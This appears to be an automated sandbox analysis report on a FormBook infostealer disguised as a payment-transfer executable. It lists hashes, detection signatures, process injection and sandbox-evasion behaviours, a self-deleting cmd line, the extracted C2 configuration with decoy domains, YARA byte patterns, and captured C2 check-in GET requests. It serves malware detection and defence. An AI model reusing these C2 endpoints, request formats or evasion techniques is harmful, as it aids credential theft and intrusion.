Analysis Report Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Overview

General Information

Sample Name: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Analysis ID: 356535
MD5: 5f1c9c4a7bc24c3d39a5a3834ba7bb8e
SHA1: 0e9a21a75675c636438f50d90bb5f7ec9a689275
SHA256: 5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)
    • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6840 cmdline: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 6224 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4188 cmdline: /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jaemagreci.com/blr/"], "decoy": ["cvmjqcid.com", "cubskw.com", "carbeloy.com", "lucascolterneal.com", "robertlainstrom.com", "long9000.com", "drtconseils.com", "keptus.com", "mediamonkeyhouse.com", "outletmihotel.com", "exchangemailboxrepair.com", "kanaai.com", "mountshastajerky.com", "thepettybox.com", "sweetpopntreatz.com", "wpweasel.com", "plumbersinauckland.com", "sevdaduragi.com", "gesunde-ordnung.com", "10751wilshire801.com", "brandmkttx.net", "yoshiyama-potager.com", "na230.com", "kittyninja.net", "eurythmy.net", "circlecitydesign.com", "thesleepinn.com", "olgadalila.com", "happyaiper.com", "supplierdurian.site", "simplymcs.com", "ug-storecards.com", "gannahealing.com", "ginamoney.com", "emilyadkinsonrealtor.com", "tablatiffin.com", "laughinggrassfarm.com", "thebriartowns.com", "youplus.website", "soheilvaseghi.com", "prodhealth.site", "bltck.com", "zomapa.com", "hcssgy.com", "simplyloveoccasions.com", "mdglitzallstars.com", "rck.xyz", "stanchilo.com", "avadl.pro", "astursuites.com", "whowetrust.com", "easpipe.com", "ortopediagalvao.com", "wellhealt.com", "destinyhouseacton.com", "lazyturtletikibar.com", "online-verifieren.net", "jasa-software.com", "tenager365.com", "atgiven.icu", "recette-originale.com", "danielleandnic.com", "kathrynbaierling.com", "emmaxbellecandleco.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x13b3b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13b632:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x1679d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x167c52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x147155:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x173775:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x146c41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x173261:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147257:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x173877:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1473cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x1739ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x13c04a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x16866a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x145ebc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1724dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x13cd43:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x169363:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x14cdf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x179417:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x14ddfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Virustotal: Detection: 25%
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Joe Sandbox ML: detected
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

Uses 32bit PE files
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
Source: Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop edi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.jaemagreci.com/blr/
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.kanaai.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.cvmjqcid.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.jaemagreci.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.sweetpopntreatz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.long9000.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.soheilvaseghi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.gannahealing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.olgadalila.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1 | Host: www.zomapa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 35.246.6.109
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: IDCFIDCFrontierIncJP
Source: Joe Sandbox View | ASN Name: MULTA-ASN1US
Source: unknown | DNS traffic detected: queries for: www.kanaai.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Feb 2021 08:44:23 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding
Source: explorer.exe, 00000005.00000002.754895939.0000000004E61000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carbeloy.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carbeloy.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carbeloy.com/blr/www.prodhealth.site
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.carbeloy.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.cvmjqcid.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.cvmjqcid.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.cvmjqcid.com/blr/www.jaemagreci.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.cvmjqcid.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.gannahealing.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.gannahealing.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.gannahealing.com/blr/www.olgadalila.com
Source: explorer.exe, 00000009.00000002.748643610.000000000561F000.00000004.00000001.sdmp | String found in binary or memory: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ix
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | String found in binary or memory: http://www.gannahealing.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com/blr/www.sweetpopntreatz.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com/blr/j
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com/blr/www.cvmjqcid.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com/blr/
